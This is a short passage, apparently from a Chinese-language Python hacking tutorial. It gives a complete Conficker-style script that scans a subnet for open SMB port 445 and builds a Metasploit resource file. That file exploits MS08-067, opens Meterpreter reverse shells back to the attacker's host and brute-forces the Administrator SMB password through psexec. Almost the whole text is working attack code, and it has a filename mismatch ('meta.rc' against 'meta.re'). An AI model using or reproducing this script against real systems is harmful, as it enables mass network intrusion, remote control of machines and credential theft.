完整
腳本能掃描可能的目標, 利用MS08_067漏洞, 並通過暴力猜測密碼遠程執行一個進程。
最後, 還要在main()函數中添加一些參數解析代碼,然後調用剛才編寫的那些函數, 以完成腳本的編寫。
import os import optparse import sys import nmap def findTgts(subNet): nmScan = nmap.PortScanner() nmScan.scan(subNet, '445') tgtHosts = [] for host in nmScan.all_hosts(): if nmScan[host].has_tcp(445): state = nmScan[host]['tcp'][445]['state'] if state == 'open': print('[+] Found Target Host:' + host) tgtHosts.append(host) return tgtHosts def setupHandler(configFile, lhost, lport): configFile.write('use exploit/multi/handler\n') configFile.write('setPAYLOAD ' + 'windows/meterpreter/reverse_tcp\n') configFile.write('set LPORT ' + str(lport) + '\n') configFile.write('set LHOST ' + lhost + '\n') configFile.write('exploit -j -z\n') configFile.write('setg DisablePayloadHandler 1\n') def confickerExploit(configFile, tgtHost, lhost, lport): configFile.write('use exploit/windows/smb/ms08_067_netapi \n') configFile.write('set RHOST ' +str(tgtHost) +'\n') configFile.write('set PAYLOAD '+ 'windows/meterpreter/reverse_tcp\n') configFile. write ('set LPORT ' +str(lport) + '\n') configFile. write ('set LHOST ' +lhost +'\n') configFile. write ('exploit -j -z\n') def smbBrute(configFile, tgtHost, passwdFile, lhost, lport): username = 'Administrator' pF = open( passwdFile, 'r' ) for password in pF.readlines(): password = password.strip('\n').strip('\r') configFile.write('use exploit/windows/smb/psexec\n') configFile.write('set SMBUser ' + str(username) + '\n') configFile.write('set SMBPass ' + str(password) + '\n') configFile.write('set RHOST ' + str(tgtHost) + '\n') configFile.write('set PAYLOAD ' + 'windows/meterpreter/reverse_tcp\n') configFile.write('set LPORT ' + str(lport) + '\n') configFile.write('set LHOST ' + lhost + '\n') configFile.write('exploit -j -z\n') def main(): configFile = open('meta.rc', 'w') parser = optparse.OptionParser('[-] Usage%prog ' + '-H <RHOST[s]> -l <LHOST> [-p <LPORT> -F <Password File>]') parser.add_option('-H', dest='tgtHost', type='string', help='specify the target address [es]') parser.add_option('-p', dest='lport', type='string', help='specify the listen port') parser.add_option('-l', dest='lhost', type = 'string', help='specify the listen address') parser.add_option('-F', dest='passwdFile', type='string', help='password file for SMB brute force attempt') (options, args) = parser.parse_args() if (options.tgtHost == None) | (options.lhost == None): print(parser.usage) exit(0) lhost = options.lhost lport = options.lport if lport == None: lport = '1337' passwdFile = options.passwdFile tgtHosts = findTgts(options.tgtHost) setupHandler(configFile, lhost, lport) for tgtHost in tgtHosts: confickerExploit(configFile, tgtHost, lhost, lport) if passwdFile != None: smbBrute(configFile, tgtHost, passwdFile, lhost, lport) configFile.close() os.system('msfconsole -r meta.re') if __name__ == '__main__': main()